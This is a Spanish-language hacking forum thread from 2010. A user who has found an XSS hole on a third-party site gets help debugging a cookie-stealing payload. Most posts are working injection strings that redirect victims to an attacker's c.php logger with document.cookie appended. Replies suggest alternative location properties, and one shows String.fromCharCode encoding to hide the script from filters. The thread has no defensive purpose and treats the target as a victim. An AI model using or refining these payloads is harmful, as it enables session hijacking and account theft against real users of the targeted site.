XSS Help!!!

[{O_o}] · 10 Febrero 2010, 17:15 PM

Encontre un bug de xss en una pagina web al poner "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="[url="http://mysite.us/c.php?cookie="+document.cookie;"]http://mysite.us/c.php?cookie="+document.cookie;[/url]</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!

tragantras · 10 Febrero 2010, 17:20 PM

esto va en nivel web... XD
prueba con document.location en lugar de window.location

pD: de javascript no tengo demasiada idea pero es lo k e visto @ google :/

un saludo!

[{O_o}] · 10 Febrero 2010, 17:27 PM

De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="[url="http://mysite.us/c.php?cookie="+"]http://mysite.us/c.php?cookie="+[/url] document.cookie;</script>

ya tambien lo e tratado y nada.

Shell Root · 10 Febrero 2010, 19:06 PM

En el primer codigo, no te funko porque pusiste

Código [Seleccionar]

"><scritp>....
y es

Código [Seleccionar]

"><script>....
xD, ahora en el segundo codigo, intentad ponerlo bajo comillas simples y no dobles

[{O_o}] · 10 Febrero 2010, 19:12 PM

Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.

Castg! · 10 Febrero 2010, 21:24 PM

que raro $:-\$ , nose, proba con self.location

[{O_o}] · 10 Febrero 2010, 21:47 PM

http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.

~ Yoya ~ · 10 Febrero 2010, 22:09 PM

Haber, muestra lo siguiente:

El codigo php para guardar el archivo de texto con las cookie.
Muestra los permiso del archivo php y los permiso de la carpeta donde esta este.
Muestra una captura aver si el XSS funciona correctamente.

~ Yoya ~ · 10 Febrero 2010, 22:25 PM

Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira.

Primero vamos encodear el codigo javascript a ASCII , que sera este:

Código [Seleccionar]


<script>window.location="http://www.google.com";</script>

Ahora sera:

Código [Seleccionar]

60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62

Entonce la XSS quedara asi

Código [Seleccionar]

"><script>document.write(String.fromCharCode(
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>

Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII:
Herramienta

Saludos espero que funcione.

[{O_o}] · 10 Febrero 2010, 22:38 PM

Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.